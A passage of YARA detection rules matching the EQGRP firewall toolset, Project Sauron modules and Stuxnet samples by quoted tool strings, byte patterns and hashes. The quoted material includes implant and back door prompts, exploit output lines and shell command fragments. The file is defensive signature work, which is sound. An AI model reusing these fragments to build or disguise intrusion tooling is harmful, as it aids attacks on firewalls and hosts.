+      $x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii
+      $x2 = "There is no implant present on the firewall." fullword ascii
+      $x3 = "Implant Version :%lx%lx%lx" fullword ascii
+      $x4 = "You may now connect to the implant using the pbd idkey" fullword ascii
+      $x5 = "No reply from persistant back door." fullword ascii
+      $x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii
+      $p1 = "PBD_GetVersion" fullword ascii
+      $p2 = "pbd/pbdEncrypt.bin" fullword ascii
+      $p3 = "pbd/pbdGetVersion.pkt" fullword ascii
+      $p4 = "pbd/pbdStartWrite.bin" fullword ascii
+      $p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii
+      $p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii
+      $s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii
+      $s2 = "Could not get hook and jump addresses" fullword ascii
+      $s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii
+      $s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii
+      $s5 = "Invalid implant file" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 3000KB and ( 1 of ( $x* ) or 1 of ( $p* ) ) ) or ( 3 of them )
+}
+
+rule APT_EQGRP_sploit_RID2CCE : APT DEMO FILE SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+      hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+      tags = "APT, DEMO, FILE, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii
+      $s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" fullword ascii
+      $s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" fullword ascii
+      $s4 = "exp.load_vinfo()" fullword ascii
+      $s5 = "if not okay and self.terminateFlingOnException:" fullword ascii
+      $s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii
+      $s7 = "if self.terminateFlingOnException:" fullword ascii
+      $s8 = "print 'Debug info ','='*40" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 90KB and 1 of ( $s* ) ) or ( 4 of them )
+}
+
+rule APT_EQGRP_Implants_Gen2_RID2F26 : APT DEMO FILE T1083 {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+      hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+      tags = "APT, DEMO, FILE, T1083"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Modules persistence file written successfully" fullword ascii
+      $x2 = "Modules persistence data successfully removed" fullword ascii
+      $x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii
+      $s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii
+      $s2 = "Error while attemping to persist modules:" fullword ascii
+      $s3 = "Error while reading interface info from PIX" fullword ascii
+      $s4 = "LP.c:pixFree - Failed to get response" fullword ascii
+      $s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" fullword ascii
+      $s6 = "Unable to fetch config address for this OS version" fullword ascii
+      $s7 = "LP.c: interface information not available for this session" fullword ascii
+      $s8 = "[%s:%s:%d] ERROR: " fullword ascii
+      $s9 = "extract_fgbg" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 5 of them )
+}
+
+rule APT_EQGRP_Implants_Gen1_RID2F25 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+      hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+      hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WARNING:  Session may not have been closed!" fullword ascii
+      $s2 = "EXEC Packet Processed" fullword ascii
+      $s3 = "Failed to insert the command into command list." fullword ascii
+      $s4 = "Send_Packet: Trying to send too much data." fullword ascii
+      $s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii
+      $s6 = "Wrong Payload Size" fullword ascii
+      $s7 = "Unknown packet received......" fullword ascii
+      $s8 = "Returned eax = %08x" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 6000KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+}
+
+rule APT_EQGRP_eligiblebombshell_generic_RID3464 : APT DEMO GEN SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 15:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+      hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+      tags = "APT, DEMO, GEN, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "logging.error(\"       Perhaps you should run with --scan?\")" fullword ascii
+      $s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii
+      $s3 = "\"be supplied\")" fullword ascii
+   condition: 
+      ( filesize < 70KB and 2 of ( $s* ) ) or ( all of them )
+}
+
+rule APT_EQGRP_ssh_telnet_29_RID2F36 : APT DEMO SCRIPT T1021 {
+   meta:
+      description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
+      hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
+      tags = "APT, DEMO, SCRIPT, T1021"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "received prompt, we're in" fullword ascii
+      $s2 = "failed to login, bad creds, abort" fullword ascii
+      $s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii
+      $s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii
+      $s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
+      $s6 = "received arp - EPBA: ok, payload: fail" fullword ascii
+      $s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii
+   condition: 
+      ( filesize < 10KB and 2 of them ) or ( 3 of them )
+}
+
+rule APT_EQGRP_Extrabacon_Output_RID312A : APT DEMO EXPLOIT {
+   meta:
+      description = "EQGRP Toolset Firewall - Extrabacon exploit output"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 13:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "|###[ SNMPresponse ]###" fullword ascii
+      $s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
+      $s3 = "[+] building payload for mode pass-disable" fullword ascii
+      $s4 = "[+] Executing:  extrabacon" fullword ascii
+      $s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule APT_EQGRP_noclient_3_0_5_RID2F44 : APT DEMO FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 11:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii
+      $x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." fullword ascii
+      $x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+      $x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii
+      $x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them )
+}
+
+rule APT_EQGRP_installdate_RID2EC8 : APT DEMO {
+   meta:
+      description = "Detects tool from EQGRP toolset - file installdate.pl"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 11:29:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii
+      $x2 = "print \"Gimme hex: \";" fullword ascii
+      $x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii
+      $s1 = "if ($_ =~ /InstallDate/) {" fullword ascii
+      $s2 = "if (not($cmdInput)) {" fullword ascii
+      $s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii
+   condition: 
+      filesize < 2KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule APT_EQGRP_teflondoor_RID2E6F : APT DEMO EXE FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file teflondoor.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 11:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s: abort.  Code is %d.  Message is '%s'" fullword ascii
+      $x2 = "%s: %li b (%li%%)" fullword ascii
+      $s1 = "no winsock" fullword ascii
+      $s2 = "%s: %s file '%s'" fullword ascii
+      $s3 = "peer: connect" fullword ascii
+      $s4 = "read: write" fullword ascii
+      $s5 = "%s: done!" fullword ascii
+      $s6 = "%s: %li b" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) and 3 of them
+}
+
+rule APT_EQGRP_durablenapkin_solaris_2_0_1_RID349F : APT DEMO FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 15:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii
+      $s2 = "send_request: putmsg \"%s\": %s" fullword ascii
+      $s3 = "port undefined" fullword ascii
+      $s4 = "recv_ack: %s getmsg: %s" fullword ascii
+      $s5 = ">> %d -- %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 40KB and 2 of them )
+}
+
+rule APT_EQGRP_teflonhandle_RID2F27 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 11:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii
+      $s2 = "File %s already exists.  Overwrite? (y/n) " fullword ascii
+      $s3 = "Random Key : 0x" fullword ascii
+      $s4 = "done (%i bytes written)." fullword ascii
+      $s5 = "%s --> %s..." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 2 of them
+}
+
+rule APT_EQGRP_false_RID2C3E : APT DEMO EXE FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file false.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 09:40:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+         00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75
+         00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+         00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
+         00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20
+         2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E
+         0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E
+         0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00
+         00 25 64 20 2D 20 25 64 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and $s1
+}
+
+rule APT_EQGRP_dn_1_0_2_1_RID2D45 : APT DEMO FILE LINUX {
+   meta:
+      description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 10:24:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii
+      $s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii
+      $s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii
+      $s4 = "Not everything is set yet" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 2 of them )
+}
+
+rule APT_EQGRP_morel_RID2C52 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file morel.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 09:44:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%d - %d, %d" fullword ascii
+      $s2 = "%d - %lu.%lu %d.%lu" fullword ascii
+      $s3 = "%d - %d %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+}
+
+rule APT_EQGRP_bc_parser_RID2DE4 : APT DEMO FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - file bc-parser"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 10:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "*** Target may be susceptible to FALSEMOREL      ***" fullword ascii
+      $s2 = "*** Target is susceptible to FALSEMOREL          ***" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and 1 of them
+}
+
+rule APT_EQGRP_1212_RID2AF9 : APT DEMO {
+   meta:
+      description = "Detects tool from EQGRP toolset - file 1212.pl"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 08:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii
+      $s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii
+      $s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii
+      $s4 = "$dstport=hextoPort($dstport);" fullword ascii
+      $s5 = "sub hextoPort" fullword ascii
+      $s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+   condition: 
+      filesize < 6KB and 4 of them
+}
+
+rule APT_EQGRP_1212_dehex_RID2D66 : APT DEMO FILE {
+   meta:
+      description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-15 10:30:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii
+      $s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii
+      $s3 = "push(@octets,$byte_table{$tempi});" fullword ascii
+      $s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii
+      $s5 = "print hextoIP($ARGV[0]);" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 6KB and ( 5 of ( $s* ) ) ) or ( all of them )
+}
+
+rule APT_Project_Sauron_arping_module_RID33C8 : APT DEMO G0041 {
+   meta:
+      description = "Detects strings from arping module - Project Sauron report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2016-08-08 15:02:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0041"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Resolve hosts that answer" 
+      $s2 = "Print only replying Ips" 
+      $s3 = "Do not display MAC addresses" 
+   condition: 
+      all of them
+}
+
+rule APT_Project_Sauron_kblogi_module_RID33BF : APT DEMO G0041 {
+   meta:
+      description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2016-08-08 15:01:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0041"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Inject using process name or pid. Default" 
+      $s2 = "Convert mode: Read log from file and convert to text" 
+      $s3 = "Maximum running time in seconds" 
+   condition: 
+      $x1 or 2 of them
+}
+
+rule APT_Project_Sauron_basex_module_RID335A : APT DEMO G0041 {
+   meta:
+      description = "Detects strings from basex module - Project Sauron report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2016-08-08 14:44:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0041"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "64, 64url, 32, 32url or 16." 
+      $s2 = "Force decoding when input is invalid/corrupt" 
+      $s3 = "This cruft" 
+   condition: 
+      $x1 or 2 of them
+}
+
+rule APT_Project_Sauron_dext_module_RID32FC : APT DEMO G0041 {
+   meta:
+      description = "Detects strings from dext module - Project Sauron report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2016-08-08 14:28:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, G0041"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Assemble rows of DNS names back to a single string of data" 
+      $x2 = "removes checks of DNS names and lengths (during split)" 
+      $x3 = "Randomize data lengths (length/2 to length)" 
+      $x4 = "This cruft" 
+   condition: 
+      2 of them
+}
+
+rule Hacktool_This_Cruft_RID2EA0 : APT DEMO EXE FILE G0041 HKTL {
+   meta:
+      description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2016-08-08 11:22:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0041, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "This cruft" fullword
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and $x1 )
+}
+
+rule Typical_Malware_String_Transforms_RID3473 : DEMO EXE FILE HIGHVOL MAL SUSP {
+   meta:
+      description = "Detects typical strings in a reversed or otherwise modified form"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-31 15:31:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, HIGHVOL, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $e1 = "exe.tsohcvs" fullword ascii
+      $e2 = "exe.ssasl" fullword ascii
+      $e3 = "exe.rerolpxe" fullword ascii
+      $e4 = "exe.erolpxei" fullword ascii
+      $e5 = "exe.23lldnur" fullword ascii
+      $e6 = "exe.dmc" fullword ascii
+      $e7 = "exe.llikksat" fullword ascii
+      $l1 = "lld.23lenreK" fullword ascii
+      $l2 = "lld.ESABLENREK" fullword ascii
+      $l3 = "lld.esabtpyrc" fullword ascii
+      $l4 = "lld.trcvsm" fullword ascii
+      $l5 = "LLD.LLDTN" fullword ascii
+      $i1 = "paeHssecorPteG" fullword ascii
+      $i2 = "sserddAcorPteG" fullword ascii
+      $i3 = "AyrarbiLdaoL" fullword ascii
+      $i4 = "AssecorPetaerC" fullword ascii
+      $r1 = "teSlortnoCtnerruC" fullword ascii
+      $r2 = "nuR\\noisreVtnerruC" fullword ascii
+      $f1 = "\\23metsys\\" ascii
+      $f2 = "\\23metsyS\\" ascii
+      $f3 = "niB.elcyceR$" fullword ascii
+      $f4 = "%tooRmetsyS%" fullword ascii
+      $fp1 = "Application Impact Telemetry Static Analyzer" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and 1 of them and not 1 of ( $fp* ) )
+}
+
+rule APT_StuxNet_dll_RID2CCB : APT DEMO EXE FILE {
+   meta:
+      description = "Stuxnet Sample - file dll.dll"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 10:04:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and $s1
+}
+
+rule APT_StuxNet_Malware_1_RID2EE8 : APT DEMO MAL {
+   meta:
+      description = "Stuxnet Sample - file malware.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 11:34:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } 
+      $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } 
+      $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } 
+   condition: 
+      all of them
+}
+
+rule APT_Stuxnet_Shortcut_to_RID304D : APT DEMO FILE T1023 T1210 {
+   meta:
+      description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 12:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
+      tags = "APT, DEMO, FILE, T1023, T1210"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
+   condition: 
+      uint16 ( 0 ) == 0x004c and filesize < 10KB and $x1
+}
+
+rule APT_Stuxnet_Malware_3_RID2F0A : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Stuxnet Sample - file ~WTR4141.tmp"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 11:40:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
+      hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SHELL32.DLL.ASLR." fullword wide
+      $s1 = "~WTR4141.tmp" fullword wide
+      $s2 = "~WTR4132.tmp" fullword wide
+      $s3 = "totalcmd.exe" fullword wide
+      $s4 = "wincmd.exe" fullword wide
+      $s5 = "http://www.realtek.com0" fullword ascii
+      $s6 = "{%08x-%08x-%08x-%08x}" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ( $s* ) ) ) or ( 5 of them )
+}
+
+rule APT_Stuxnet_Malware_4_RID2F0B : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Stuxnet Sample"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 11:40:21"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
+      hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
+      $x2 = "MRxCls.sys" fullword wide
+      $x3 = "MRXNET.Sys" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them )
+}
+
+rule APT_Stuxnet_maindll_decrypted_unpacked_RID365D : APT DEMO {
+   meta:
+      description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 16:52:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide
+      $s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide
+      $s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide
+      $s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide
